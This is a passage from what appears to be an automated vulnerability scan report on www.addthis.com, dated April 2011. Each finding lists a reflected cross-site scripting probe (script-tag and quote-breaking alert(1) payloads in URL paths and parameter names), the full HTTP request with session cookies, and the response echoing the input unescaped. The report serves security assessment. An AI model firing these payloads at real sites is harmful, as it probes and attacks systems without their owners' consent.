Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303529621.1FE|1303529621.60|1303408224.66; PHPSESSID=nmivqb66311fd27rub5prl9gn6; ana_svc=cb; Coyote-2-a0f0083=a0f0232:0; __utmz=56306477.1303530430.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=56306477.656125860.1303530430.1303530430.1303530430.1; __utmc=56306477; __utmb=56306477.2.10.1303530430; uid=4dab4fa85facd099; psc=4; _chartbeat2=v6gcvdw86l4w274q

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/favicon.ico97f53"-alert(1)-"f20737a456b";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

2.38. http://www.addthis.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 34502<script>alert(1)</script>8f448908630 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico34502<script>alert(1)</script>8f448908630 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303529621.1FE|1303529621.60|1303408224.66; PHPSESSID=nmivqb66311fd27rub5prl9gn6; ana_svc=cb; Coyote-2-a0f0083=a0f0232:0; __utmz=56306477.1303530430.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=56306477.656125860.1303530430.1303530430.1303530430.1; __utmc=56306477; __utmb=56306477.2.10.1303530430; uid=4dab4fa85facd099; psc=4; _chartbeat2=v6gcvdw86l4w274q

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>favicon.ico34502<script>alert(1)</script>8f448908630</strong>
...[SNIP]...

2.39. http://www.addthis.com/forum/style.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/forum/style.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4f330<script>alert(1)</script>27a56ac7c3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forum4f330<script>alert(1)</script>27a56ac7c3c/style.php?sid=8a09daf87580e5e30280b1bc93fca9c6&id=4&lang=en HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=gkp6pj3lqeoc1bjeombicdlf20; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>forum4f330<script>alert(1)</script>27a56ac7c3c/style.php?sid=8a09daf87580e5e30280b1bc93fca9c6&id=4&lang=en</strong>
...[SNIP]...

2.40. http://www.addthis.com/forum/style.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/forum/style.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fcd6"-alert(1)-"c8fca7f5598 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /forum3fcd6"-alert(1)-"c8fca7f5598/style.php?sid=8a09daf87580e5e30280b1bc93fca9c6&id=4&lang=en HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=rhpk2d9pe160m213hbmms797s2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/forum3fcd6"-alert(1)-"c8fca7f5598/style.php";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);

...[SNIP]...

2.41. http://www.addthis.com/forum/style.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/forum/style.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 36f49<script>alert(1)</script>db36789bdfd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forum/36f49<script>alert(1)</script>db36789bdfd?sid=8a09daf87580e5e30280b1bc93fca9c6&id=4&lang=en HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 03:54:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>forum/36f49<script>alert(1)</script>db36789bdfd?sid=8a09daf87580e5e30280b1bc93fca9c6&id=4&lang=en</strong>
...[SNIP]...

2.42. http://www.addthis.com/forum/style.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/forum/style.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb798"-alert(1)-"6ed602dc3b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /forum/bb798"-alert(1)-"6ed602dc3b?sid=8a09daf87580e5e30280b1bc93fca9c6&id=4&lang=en HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 03:54:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/forum/bb798"-alert(1)-"6ed602dc3b";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

2.43. http://www.addthis.com/get-addthis [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/get-addthis

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4e23"-alert(1)-"ffb5dfd6d22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /get-addthisb4e23"-alert(1)-"ffb5dfd6d22?where=website&type=bm&clickbacks=1&frm=home&analytics=0&bm=tb14 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.addthis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303529621.1FE|1303529621.60|1303408224.66; PHPSESSID=nmivqb66311fd27rub5prl9gn6; ana_svc=cb; Coyote-2-a0f0083=a0f0232:0; __utmz=56306477.1303530430.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=56306477.656125860.1303530430.1303530430.1303530430.1; __utmc=56306477; __utmb=56306477.1.10.1303530430; uid=4dab4fa85facd099; psc=3; _chartbeat2=v6gcvdw86l4w274q

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/get-addthisb4e23"-alert(1)-"ffb5dfd6d22";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

2.44. http://www.addthis.com/get-addthis [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/get-addthis

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33c7e<script>alert(1)</script>d33ea402469 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /get-addthis33c7e<script>alert(1)</script>d33ea402469?where=website&type=bm&clickbacks=1&frm=home&analytics=0&bm=tb14 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.addthis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303529621.1FE|1303529621.60|1303408224.66; PHPSESSID=nmivqb66311fd27rub5prl9gn6; ana_svc=cb; Coyote-2-a0f0083=a0f0232:0; __utmz=56306477.1303530430.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=56306477.656125860.1303530430.1303530430.1303530430.1; __utmc=56306477; __utmb=56306477.1.10.1303530430; uid=4dab4fa85facd099; psc=3; _chartbeat2=v6gcvdw86l4w274q

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>get-addthis33c7e<script>alert(1)</script>d33ea402469?where=website&type=bm&clickbacks=1&frm=home&analytics=0&bm=tb14</strong>
...[SNIP]...

2.45. http://www.addthis.com/icons/back.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/back.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 539f2"-alert(1)-"554501bf848 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons539f2"-alert(1)-"554501bf848/back.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=okdhb1faro32v6u37d0dtm7um7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/icons539f2"-alert(1)-"554501bf848/back.gif";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
g
...[SNIP]...

2.46. http://www.addthis.com/icons/back.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/back.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d218e<script>alert(1)</script>e3920833cf4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iconsd218e<script>alert(1)</script>e3920833cf4/back.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=1ggq67iant65dlj035j7qk52e1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>iconsd218e<script>alert(1)</script>e3920833cf4/back.gif</strong>
...[SNIP]...

2.47. http://www.addthis.com/icons/back.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/back.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26ce9<script>alert(1)</script>8e4b0e29bba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /icons/back.gif26ce9<script>alert(1)</script>8e4b0e29bba HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=ja11gplmlask27jgjkp3lks9s3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>icons/back.gif26ce9<script>alert(1)</script>8e4b0e29bba</strong>
...[SNIP]...

2.48. http://www.addthis.com/icons/back.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/back.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa98c"-alert(1)-"1fe06bd13df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons/back.giffa98c"-alert(1)-"1fe06bd13df HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=2i3267o399rl2n9vv88a06l726; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/icons/back.giffa98c"-alert(1)-"1fe06bd13df";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

2.49. http://www.addthis.com/icons/back.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/back.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a4b55<script>alert(1)</script>5e2ac006c5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /icons/back.gif?a4b55<script>alert(1)</script>5e2ac006c5e=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=hlhs2fugrbo28705656kdfhdv2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>icons/back.gif?a4b55<script>alert(1)</script>5e2ac006c5e=1</strong>
...[SNIP]...

2.50. http://www.addthis.com/icons/blank.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/blank.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce4b4"-alert(1)-"716023dba10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /iconsce4b4"-alert(1)-"716023dba10/blank.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=mc54cq9cjrsvccc3v9epk11vu7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/iconsce4b4"-alert(1)-"716023dba10/blank.gif";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);

...[SNIP]...

2.51. http://www.addthis.com/icons/blank.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/blank.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1659a<script>alert(1)</script>e062ce7c1b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /icons1659a<script>alert(1)</script>e062ce7c1b3/blank.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=1f3kn0mbe0mn1bmchho696s541; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
